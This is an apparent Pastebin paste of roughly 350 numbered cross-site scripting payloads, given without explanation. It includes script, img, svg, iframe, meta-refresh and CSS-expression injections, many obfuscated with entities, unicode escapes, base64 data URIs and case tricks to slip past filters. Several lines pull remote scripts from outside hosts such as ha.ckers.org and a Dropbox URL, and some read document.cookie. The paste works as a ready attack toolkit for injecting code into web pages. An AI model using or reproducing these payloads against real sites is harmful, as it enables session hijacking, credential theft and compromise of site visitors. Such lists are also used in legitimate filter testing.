Advertisement
Guest User

Untitled

a guest
Jun 16th, 2019
639
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 80.48 KB | None | 0 0
  1. <script>alert(123);</script>
  2. <ScRipT>alert("XSS");</ScRipT>
  3. <script>alert(123)</script>
  4. <script>alert("hellox worldss");</script>
  5. <script>alert(“XSS”)</script>
  6. <script>alert(“XSS”);</script>
  7. <script>alert(‘XSS’)</script>
  8. “><script>alert(“XSS”)</script>
  9. <script>alert(/XSS”)</script>
  10. <script>alert(/XSS/)</script>
  11. </script><script>alert(1)</script>
  12. ‘; alert(1);
  13. ‘)alert(1);//
  14. <ScRiPt>alert(1)</sCriPt>
  15. <IMG SRC=jAVasCrIPt:alert(‘XSS’)>
  16. <IMG SRC=”javascript:alert(‘XSS’);”>
  17. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  18. <IMG SRC=javascript:alert(‘XSS’)>
  19. <img src=xss onerror=alert(1)>
  20. <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
  21. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  22. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  23. <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
  24. <img/src=`%00` onerror=this.onerror=confirm(1)
  25.  
  26. <form><isindex formaction="javascript&colon;confirm(1)"
  27.  
  28. <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
  29.  
  30. <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
  31.  
  32. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  33.  
  34. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  35.  
  36. <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
  37.  
  38. &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
  39.  
  40. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  41.  
  42. <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  43.  
  44. <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
  45.  
  46. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  47.  
  48. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  49. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  50. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
  51. </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
  52. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  53. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  54. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
  55. http://www.google<script .com>alert(document.location)</script
  56. <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  57.  
  58. <img/src=@&#32;&#13; onerror = prompt('&#49;')
  59.  
  60. <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  61.  
  62. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  63.  
  64. </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  65.  
  66. &#00;</form><input type&#61;"date" onfocus="alert(1)">
  67.  
  68. <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  69.  
  70. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  71.  
  72. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  73.  
  74. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  75.  
  76. <script ~~~>alert(0%0)</script ~~~>
  77.  
  78. <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  79.  
  80. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  81.  
  82. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
  83.  
  84. &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
  85.  
  86. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
  87.  
  88. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  89.  
  90. <div/style="width:expression(confirm(1))">X</div> {IE7}
  91.  
  92. <iframe/%00/ src=javaSCRIPT&colon;alert(1)
  93.  
  94. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
  95.  
  96. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  97.  
  98. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  99.  
  100. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  101.  
  102. <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  103.  
  104. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  105.  
  106. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
  107.  
  108. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  109.  
  110. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  111.  
  112. <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  113.  
  114. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  115.  
  116. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  117.  
  118. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  119.  
  120. <var onmouseover="prompt(1)">On Mouse Over</var>
  121.  
  122. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  123.  
  124. <img src="/" =_=" title="onerror='prompt(1)'">
  125.  
  126. <%<!--'%><script>alert(1);</script -->
  127.  
  128. <script src="data:text/javascript,alert(1)"></script>
  129. <iframe/src \/\/onload = prompt(1)
  130.  
  131. <iframe/onreadystatechange=alert(1)
  132.  
  133. <svg/onload=alert(1)
  134.  
  135. <input value=<><iframe/src=javascript:confirm(1)
  136.  
  137. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  138.  
  139. http://www.<script>alert(1)</script .com
  140.  
  141. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  142.  
  143. <svg><script ?>alert(1)
  144.  
  145. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  146.  
  147. <img src=`xx:xx`onerror=alert(1)>
  148.  
  149. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  150. <math><a xlink:href="//jsfiddle.net/t846h/">click
  151.  
  152. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  153. <svg contentScriptType=text/vbs><script>MsgBox+1
  154.  
  155. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  156.  
  157. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  158.  
  159. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  160.  
  161. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  162. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  163.  
  164. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  165.  
  166. <script>+-+-1-+-+alert(1)</script>
  167.  
  168. <body/onload=&lt;!--&gt;&#10alert(1)>
  169.  
  170. <script itworksinallbrowsers>/*<script* */alert(1)</script
  171.  
  172. <img src ?itworksonchrome?\/onerror = alert(1)
  173.  
  174. <svg><script>//&NewLine;confirm(1);</script </svg>
  175. <svg><script onlypossibleinopera:-)> alert(1)
  176.  
  177. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  178.  
  179. <script x> alert(1) </script 1=2
  180.  
  181. <div/onmouseover='alert(1)'> style="x:">
  182.  
  183. <--`<img/src=` onerror=alert(1)> --!>
  184. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  185.  
  186. <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  187.  
  188. "><img src=x onerror=window.open('https://www.google.com/');>
  189.  
  190. <form><button formaction=javascript&colon;alert(1)>CLICKME
  191.  
  192. <math><a xlink:href="//jsfiddle.net/t846h/">click
  193.  
  194. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  195.  
  196. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  197.  
  198. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  199.  
  200. <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
  201. ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  202. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
  203. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  204. <IMG SRC=”jav ascript:alert(‘XSS’);”>
  205. <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
  206. <<SCRIPT>alert(“XSS”);//<</SCRIPT>
  207. %253cscript%253ealert(1)%253c/script%253e
  208. “><s”%2b”cript>alert(document.cookie)</script>
  209. foo<script>alert(1)</script>
  210. <scr<script>ipt>alert(1)</scr</script>ipt>
  211. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  212. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  213. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  214. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  215. <BODY ONLOAD=alert(‘XSS’)>
  216. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
  217. <IMG SRC=”javascript:alert(‘XSS’)”
  218. <iframe src=http://ha.ckers.org/scriptlet.html <
  219. javascript:alert("hellox worldss")
  220. <img src="javascript:alert('XSS');">
  221. <img src=javascript:alert(&quot;XSS&quot;)>
  222. <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  223. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  224. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  225. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  226. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  227. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  228. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  229. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  230. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  231. <<SCRIPT>alert("XSS");//<</SCRIPT>
  232. <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  233. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  234. <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  235. <script>alert("XSS");</script>&search=1
  236. 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  237. <h1><font color=blue>hellox worldss</h1>
  238. <BODY ONLOAD=alert('hellox worldss')>
  239. <input onfocus=write(XSS) autofocus>
  240. <input onblur=write(XSS) autofocus><input autofocus>
  241. <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  242. <form><button formaction="javascript:alert(XSS)">lol
  243. <!--<img src="--><img src=x onerror=alert(XSS)//">
  244. <![><img src="]><img src=x onerror=alert(XSS)//">
  245. <style><img src="</style><img src=x onerror=alert(XSS)//">
  246. <? foo="><script>alert(1)</script>">
  247. <! foo="><script>alert(1)</script>">
  248. </ foo="><script>alert(1)</script>">
  249. <? foo="><x foo='?><script>alert(1)</script>'>">
  250. <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
  251. <% foo><x foo="%><script>alert(123)</script>">
  252. <div style="font-family:'foo&#10;;color:red;';">LOL
  253. LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
  254. <script>({0:#0=alert/#0#/#0#(0)})</script>
  255. <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
  256. &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
  257. \\";alert('XSS');//
  258. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
  259. &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
  260. &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  261. &lt;BODY ONLOAD=alert('XSS')&gt;
  262. &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
  263. &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
  264. &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
  265. &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
  266. &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
  267. &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
  268. &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
  269. &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
  270. &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
  271. &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
  272. &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
  273. &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  274. &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
  275. &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
  276. &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
  277. žscriptualert(EXSSE)ž/scriptu
  278. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
  279. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
  280. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
  281. &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
  282. &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
  283. &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  284. &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  285. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  286. &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
  287. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  288. &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
  289. &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
  290. &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
  291. &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
  292. exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
  293. xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
  294. &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
  295. &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  296. &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
  297. &lt;!--&#91;if gte IE 4&#93;&gt;
  298. &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
  299. &lt;!&#91;endif&#93;--&gt;
  300. &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
  301. &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
  302. &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
  303. &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  304. &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  305. a=\"get\";
  306. b=\"URL(\\"\";
  307. c=\"javascript&#058;\";
  308. d=\"alert('XSS');\\")\";
  309. eval(a+b+c+d);
  310. &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
  311. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
  312. &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  313. &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  314. &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
  315. &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
  316. &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  317. &lt;HTML&gt;&lt;BODY&gt;
  318. &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
  319. &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
  320. &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
  321. &lt;/BODY&gt;&lt;/HTML&gt;
  322. &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
  323. &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
  324. &lt;? echo('&lt;SCR)';
  325. echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
  326. &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
  327. Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
  328. &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
  329. &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  330. &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  331. &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  332. &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  333. &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  334. &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  335. &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  336. &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  337. &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
  338. &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
  339. &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
  340. &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
  341. &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
  342. &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
  343. &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
  344. &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
  345. &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
  346. &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
  347. &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
  348. &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
  349. &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
  350. &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
